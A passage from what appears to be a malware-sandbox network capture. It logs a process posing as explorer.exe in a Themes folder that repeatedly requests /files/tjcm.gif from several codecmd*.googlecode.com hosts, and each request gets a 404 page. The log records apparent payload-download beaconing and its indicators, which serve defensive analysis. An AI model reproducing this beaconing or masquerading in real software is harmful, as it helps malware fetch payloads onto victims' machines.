                                                                                                      Sep 30, 2024 16:14:53.988579035 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      52192.168.2.549766108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:14:54.518049002 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd02.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:14:55.385727882 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:14:55 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:14:55.385912895 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
                                                                                                      Sep 30, 2024 16:14:55.385925055 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      53192.168.2.549767108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:14:55.807055950 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd03.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:14:56.494388103 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:14:56 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:14:56.494632006 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      54192.168.2.54976874.125.206.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:14:56.819399118 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd01.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:14:57.529365063 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:14:57 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:14:57.529654980 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      55192.168.2.549769108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:14:57.955718994 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd02.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:14:58.654021025 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:14:58 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:14:58.654079914 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      56192.168.2.549770108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:14:59.127790928 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd03.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:14:59.792126894 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:14:59 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:14:59.792155981 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      57192.168.2.54977174.125.206.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:15:00.146423101 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd01.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:15:00.859183073 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:15:00 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:15:00.859205961 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      58192.168.2.549772108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:15:01.425602913 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd02.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:15:02.123778105 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:15:02 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
